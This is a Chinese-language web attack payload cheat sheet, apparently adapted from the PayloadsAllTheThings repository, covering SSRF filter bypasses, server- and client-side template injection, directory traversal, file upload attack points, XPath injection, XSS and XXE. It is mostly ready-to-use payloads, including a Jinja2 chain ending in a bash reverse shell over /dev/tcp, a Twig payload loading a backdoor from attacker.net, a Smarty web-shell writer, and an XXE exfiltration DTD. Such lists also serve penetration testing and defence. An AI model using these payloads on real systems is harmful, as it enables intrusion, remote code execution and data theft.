可以利用SSRF攻擊內網redis、discuz、fastcgi、uwsgi、memcache、struts2、內網系統、docker、Kubernetes、Hadoop、mysql等等

1、基本利用
http://localhost:80
http://0.0.0.0:22
2、利用重定向
設定一個子域名的DNS A記錄為需要探測的內網IP，eg:127.0.0.1
http://wwww.example.com/index.php?url=http://ssrf.w2n1ck.com
3、利用檔案上傳
修改"type=file"為"type=url"
然後加入內網地址即可
4、XSS
http://brutelogic.com.br/poc.svg -> simple alert
http://wwww.example.com/index.php?url=http://brutelogic.com.br/poc.svg

Bypass

1、使用HTTPS
https://localhost/
2、使用[::]
http://[::]:80/
http://0000::1:80/
3、使用重定向
localtest.me
127.0.0.1.xip.io
www.owasp.org.127.0.0.1.xip.io
customer1.app.localhost.my.company.127.0.0.1.nip.io
4、使用CIDR(不知道是不是要配置什麼，沒利用成功)
127.x.x.x
http://127.127.127.127
http://127.0.1.3
http://127.0.0.0
http://mail.ebc.apple.com => 127.0.0.6 => localhost
5、使用異常urls
localhost:+11211aaa
localhost:00011211aaaa
參考：https://low-level.readthedocs.io/en/latest/documents/SSRFbible.Cheatsheet.pdf
6、使用進位制
可以是十六進位制，八進位制等。
115.239.210.26>>>16373751032
首先把這四段數字給分別轉成16進位制，結果：73 ef d2 1a
然後把 73efd21a 這十六進位制一起轉換成8進位制
記得訪問的時候加0表示使用八進位制(可以是一個0也可以是多個0 跟XSS中多加幾個0來繞過過濾一樣)，十六進位制加0x
http://127.0.0.1>>>http://0177.0.0.1/
http://127.0.0.1>>>http://2130706433/
http://192.168.0.1>>>http://3232235521/
http://192.168.1.1>>>http://3232235777/
7、使用特殊地址
http://0/
8、使用@
http://[email protected]
http://wwww.example.com\x40www.baidu.com
http://wwww.example.com%40www.baidu.com
技巧組合:
http://1.1.1.1 &@2.2.2.2# @3.3.3.3/
urllib2 + httplib: 1.1.1.1
requests + browsers: 2.2.2.2
urllib: 3.3.3.3
9、使用enclosed alphanumerics
http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ = example.com
List:
① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿
10、利用解析器
http://127.1.1.1:80\@127.2.2.2:80/
http://127.1.1.1:80\@@127.2.2.2:80/
http://127.1.1.1:80:\@@127.2.2.2:80/
http://127.1.1.1:80#\@127.2.2.2:80/
參考：https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf
11、利用協議
File協議
file:///etc/passwd
file://\/\/etc/passwd
Dict協議
dict://<user>;<auth>@<host>:<port>/d:<word>:<database>:<n>
ssrf.php?url=dict://attacker:11111/
SFTP協議
ssrf.php?url=sftp://example.com:11111/
TFTP協議
ssrf.php?url=tftp://example.com:12346/TESTUDPPACKET
LDAP協議
ssrf.php?url=ldap://localhost:11211/%0astats%0aquit
Gopher協議
ssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%[email protected]%3E%250d%250aRCPT%20TO%3A%[email protected]%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%[email protected]%3E%250d%250aTo%3A%20%[email protected]%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a

工具

SSRFmap - https://github.com/swisskyrepo/SSRFmap
Gopherus - https://github.com/tarunkant/Gopherus
http://blog.w2n1ck.com/ip.py

16、SSTI

Ruby

<%= 7 * 7 %> => 49
<%= File.open('/etc/passwd').read %> => cat /etc/passwd
<%= Dir.entries('/') %> => ls /

Java

${7*7}
${{7*7}}
${class.getClassLoader()}
${class.getResource("").getPath()}
${class.getResource("../../../../../index.htm").getContent()}

獲取系統環境變數:
${T(java.lang.System).getenv()}

獲取/etc/passwd:
${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}

${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}

Twig

{{7*7}} == {{7*'7'}} == 49
命令執行:
{{self}}
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}

Smarty

{php}echo `id`;{/php}
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}

Jinja2

{{4*4}}[[5*5]]
{{7*'7'}} => 7777777

獲取使用的類
{{ [].class.base.subclasses() }}
{{''.class.mro()[1].subclasses()}}
{{ ''.__class__.__mro__[2].__subclasses__() }}
獲取配置變數
{% for key, value in config.iteritems() %}
<dt>{{ key|e }}</dt>
<dd>{{ value|e }}</dd>
{% endfor %}
讀取檔案
''.__class__.__mro__[2].__subclasses__()[40] 表示檔案類
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
寫檔案
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/var/www/html/hello.txt', 'w').write('Hello here !') }}
反彈shell
1、配置
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/evilconfig.cfg', 'w').write('from subprocess import check_output\n\nRUNCMD = check_output\n') }}
2、載入
{{ config.from_pyfile('/tmp/evilconfig.cfg') }}
3、連線
{{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }}

工具

Tplmap - https://github.com/epinna/tplmap
python2.7 ./tplmap.py -u 'http://www.target.com/page?name=John*' --os-shell
python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=*&comment=supercomment&link"
python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment=A&link" --level 5 -e jade

17、CSTI

AngularJS

$eval('1+1')
{{1+1}}

Vue JS

{{constructor.constructor('alert(1)')()}}

18、目錄遍歷

1、Basic
../
..\
..\/
%2e%2e%2f
%252e%252e%252f
%c0%ae%c0%ae%c0%af
%uff0e%uff0e%u2215
%uff0e%uff0e%u2216
..././
...\.\
2、Unicode編碼
. = %u002e
/ = %u2215
\ = %u2216
3、url雙編碼
. = %252e
/ = %252f
\ = %255c
4、UTF-8 Unicode編碼
. = %c0%2e, %e0%40%ae, %c0ae
/ = %c0%af, %e0%80%af, %c0%2f
\ = %c0%5c, %c0%80%5c

19、檔案上傳

Exploit

這裡只舉一下可以利用的點，就不一一詳細例舉了。
1、黑名單繞過
2、雙檔案上傳
3、陣列
4、修改特殊欄位
5、截斷
6、解析漏洞
7、ffmpeg
8、flash
9、imagemagic
10、zip軟連線
11、htaccess
12、iis
13、ssi
14、pdf
15、python
16、csp
17、xss
18、超大檔案ddos
19、xxe
20、URL跳轉

20、XPATH注入

SQL: 

string(//user[name/text()='" +username+ "' and password/text()=’" +password+ "']/account/text())

Payloads:

' or '1'='1
' or ''='
x' or 1=1 or 'x'='y
/
//
//*
*/*
@*
count(/child::node())
x' or name()='username' or 'x'='y
' and count(/*)=1 and '1'='1
' and count(/@*)=1 and '1'='1
' and count(/comment())=1 and '1'='1

盲注: 
1、獲取長度
and string-length(account)=SIZE_INT
2、獲取內容
substring(//user[userid=5]/username,2,1)=CHAR_HERE
substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE)

21、XSS

Basic

<script>alert('XSS')</script>
<scr<script>ipt>alert('XSS')</scr<script>ipt>
"><script>alert('XSS')</script>
"><script>alert(String.fromCharCode(88,83,83))</script>

<img src=x onerror=alert('XSS');>
<img src=x onerror=alert('XSS')//
<img src=x onerror=alert(String.fromCharCode(88,83,83));>
<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>
<img src=x:alert(alt) onerror=eval(src) alt=xss>
"><img src=x onerror=alert('XSS');>
"><img src=x onerror=alert(String.fromCharCode(88,83,83));>

<svg/onload=alert('XSS')>
<svg onload=alert(1)//
<svg/onload=alert(String.fromCharCode(88,83,83))>
<svg id=alert(1) onload=eval(id)>
"><svg/onload=alert(String.fromCharCode(88,83,83))>
"><svg/onload=alert(/XSS/)

<body onload=alert(/XSS/.source)>
<input autofocus onfocus=alert(1)>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<keygen autofocus onfocus=alert(1)>
<video/poster/onerror=alert(1)>
<video><source onerror="javascript:alert(1)">
<video src=_ onloadstart="alert(1)">
<details/open/ontoggle="alert`1`">
<audio src onloadstart=alert(1)>
<marquee onstart=alert(1)>
<meter value=2 min=0 max=10 onmouseover=alert(1)>2 out of 10</meter>

<body ontouchstart=alert(1)>
<body ontouchend=alert(1)>
<body ontouchmove=alert(1)> 

<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<meta/content="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgxMzM3KTwvc2NyaXB0Pg=="http-equiv=refresh>
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

javascript協議
javascript:prompt(1)
%26%23106%26%2397%26%23118%26%2397%26%23115%26%2399%26%23114%26%23105%26%23112%26%23116%26%2358%26%2399%26%23111%26%23110%26%23102%26%23105%26%23114%26%23109%26%2340%26%2349%26%2341
javascript:confirm(1)
\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1)
\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1)
\152\141\166\141\163\143\162\151\160\164\072alert(1)
java%0ascript:alert(1) - LF (\n)
java%09script:alert(1) - tab (\t)
java%0dscript:alert(1) - CR (\r)
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\) - escape
javascript://%0Aalert(1)
javascript://anything%0D%0A%0D%0Awindow.alert(1)

data協議
data:text/html,<script>alert(0)</script>
data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+
<script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script>

XML檔案

// 使用CDATA防止payload被解析成xml
<html>
<head></head>
<body>
<something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script>
<info>
<name>
<value><![CDATA[<script>confirm(document.domain)</script>]]></value>
</name>
<description>
<value>Hello</value>
</description>
<url>
<value>http://www.baidu.com</value>
</url>
</info>
</body>
</html>

SVG檔案

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.domain);
</script>
</svg>

SWF

flashmediaelement.swf?jsinitfunctio%gn=alert`1`
flashmediaelement.swf?jsinitfunctio%25gn=alert(1)
ZeroClipboard.swf?id=\"))} catch(e) {alert(1);}//&width=1000&height=1000
swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert(1);//
swfupload.swf?buttonText=test<a href="javascript:confirm(1)"><img src="https://web.archive.org/web/20130730223443im_/http://appsec.ws/ExploitDB/cMon.jpg"/></a>&.swf
plupload.flash.swf?%#target%g=alert&uid%g=XSS&
moxieplayer.swf?url=https://github.com/phwd/poc/blob/master/vid.flv?raw=true
video-js.swf?readyFunction=alert(1)
player.swf?playerready=alert(document.cookie)
player.swf?tracecall=alert(document.cookie)
banner.swf?clickTAG=javascript:alert(1);//
io.swf?yid=\"));}catch(e){alert(1);}//
video-js.swf?readyFunction=alert%28document.domain%2b'%20XSSed!'%29
bookContent.swf?currentHTMLURL=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4
flashcanvas.swf?id=test\"));}catch(e){alert(document.domain)}//
phpmyadmin/js/canvg/flashcanvas.swf?id=test\”));}catch(e){alert(document.domain)}//

CSS

<!DOCTYPE html>
<html>
<head>
<style>
div{
background-image: url("data:image/jpg;base64,<\/style><svg/onload=alert(document.domain)>");
background-color: #cccccc;
}
</style>
</head>
<body>
<div>lol</div>
</body>
</html>

22、XXE

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>

Base64
<!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init; ]><foo/>

PHP協議
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY % xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php" >
]>
<foo>&xxe;</foo>

DOS
<!DOCTYPE data [
<!ENTITY a0 "dos" >
<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
<!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">
<!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">
]>
<data>&a4;</data>

盲注
傳送payload:
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://127.0.0.1/dtd.xml">
%sp;
%param1;
]>
<r>&exfil;</r>

遠端主機上檔案:
http://127.0.0.1/dtd.xml
<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://127.0.0.1/dtd.xml?%data;'>">

XXE in File
DOCX/XLSX/PPTX
ODT/ODG/ODP/ODS
SVG
XML
PDF (experimental)
JPG (experimental)
GIF (experimental)
利用工具: https://github.com/BuffaloWill/oxml_xxe
線上生成工具: https://buer.haus/xxegen/

有興趣的可以根據相關思路做個漏洞fuzz的字典，很有用的

w2n1ck@w2n1ck  ~/Desktop/vul_fuzz  tree -FC
.
├── api.txt
├── command_exec.txt
├── crlf.txt
├── dicc.txt
├── directory_traversal.txt
├── ldap_attributes.txt
├── lfi.txt
├── nosql.txt
├── open_redirect.txt
├── php.txt
├── sqli/
│   ├── sqli.txt
│   ├── sqli_error.txt
│   ├── sqli_mssql.txt
│   ├── sqli_mssql_insert.txt
│   ├── sqli_mssql_where.txt
│   ├── sqli_mysql.txt
│   ├── sqli_mysql_insert.txt
│   ├── sqli_mysql_order_by.txt
│   ├── sqli_mysql_where.txt
│   ├── sqli_oracle.txt
│   ├── sqli_postgres.txt
│   ├── sqli_time.txt
│   └── sqli_union.txt
├── ssi.txt
├── upload/
│   ├── ffmpeg/
│   │   ├── gen_avi_bypass.py
│   │   ├── gen_xbin_avi.py
│   │   ├── read_passwd.avi
│   │   ├── read_passwd_bypass.mp4
│   │   ├── read_shadow.avi
│   │   └── read_shadow_bypass.mp4
│   ├── flash/
│   │   ├── xss.swf
│   │   └── xssproject.swf
│   ├── htaccess/
│   │   └── 1.jpg
│   ├── iis/
│   │   ├── index.stm
│   │   └── web.config
│   ├── imagemagic/
│   │   ├── centos_id.jpg
│   │   ├── payload_imageover_file_exfiltration_pangu_wrapper.jpg
│   │   ├── payload_imageover_file_exfiltration_text_wrapper.jpg
│   │   ├── payload_imageover_reverse_shell_devtcp.jpg
│   │   ├── payload_imageover_reverse_shell_netcat_fifo.png
│   │   ├── payload_imageover_wget.gif
│   │   ├── payload_url_bind_shell_nc.mvg
│   │   ├── payload_url_curl.png
│   │   ├── payload_url_portscan.jpg
│   │   ├── payload_url_remote_connection.mvg
│   │   ├── payload_url_reverse_shell_bash.mvg
│   │   ├── payload_url_touch.jpg
│   │   ├── payload_xml_reverse_shell_nctraditional.xml
│   │   ├── payload_xml_reverse_shell_netcat_encoded.xml
│   │   ├── ubuntu_id.jpg
│   │   └── ubuntu_shell.jpg
│   ├── pdf/
│   │   ├── poc.js
│   │   ├── poc.py
│   │   └── result.pdf
│   ├── php_ext/
│   │   ├── phpinfo.jpg.php
│   │   ├── phpinfo.php3
│   │   ├── phpinfo.php4
│   │   ├── phpinfo.php5
│   │   ├── phpinfo.php7
│   │   ├── phpinfo.phpt
│   │   ├── phpinfo.pht
│   │   └── phpinfo.phtml
│   ├── picture/
│   │   ├── Build_image_to_LFI.py
│   │   ├── php_exif_data.png
│   │   ├── phpinfo-metadata.gif
│   │   ├── phpinfo-metadata.jpg
│   │   ├── shell_cinema.gif
│   │   ├── shell_fr.gif
│   │   └── shell_problem.gif
│   ├── python/
│   │   ├── python-admin-__init__.py.zip
│   │   ├── python-conf-__init__.py.zip
│   │   ├── python-config-__init__.py.zip
│   │   ├── python-controllers-__init__.py.zip
│   │   ├── python-generate-init.py
│   │   ├── python-login-__init__.py.zip
│   │   ├── python-models-__init__.py.zip
│   │   ├── python-modules-__init__.py.zip
│   │   ├── python-scripts-__init__.py.zip
│   │   ├── python-settings-__init__.py.zip
│   │   ├── python-tests-__init__.py.zip
│   │   ├── python-urls-__init__.py.zip
│   │   ├── python-utils-__init__.py.zip
│   │   └── python-view-__init__.py.zip
│   ├── ssi/
│   │   ├── exec.shtml
│   │   └── include.shtml
│   └── zip_link/
│  ├── etc_passwd.zip
│  ├── generate.sh
│  └── passwd
├── web_cache_deception_attack_headers.txt
├── xpath_injection.txt
├── xss/
│   ├── "><img\ src=x\ onerror=alert(document.cookie);.jpg
│   ├── "><svg\ onload=alert(1)>
│   ├── xss_comment_exif_metadata_double_quote.png
│   ├── xss_flashfile.swf
│   ├── xss_intruders.txt
│   ├── xss_payloads.txt
│   ├── xss_svg.svg
│   ├── xss_svg1.svg
│   ├── xss_svg2.svg
│   ├── xss_svg3.svg
│   ├── xss_swf.swf
│   ├── xss_swf_fuzz.txt
│   ├── xss_xml.xml
│   └── xss_xml_cheatsheet.html
└── xxe/
├── xml-attacks.txt
├── xxe_etc_passwd.xml
├── xxe_fuzzing.txt
└── xxe_php_wrapper.xml

原倉庫地址：https://github.com/swisskyrepo/PayloadsAllTheThings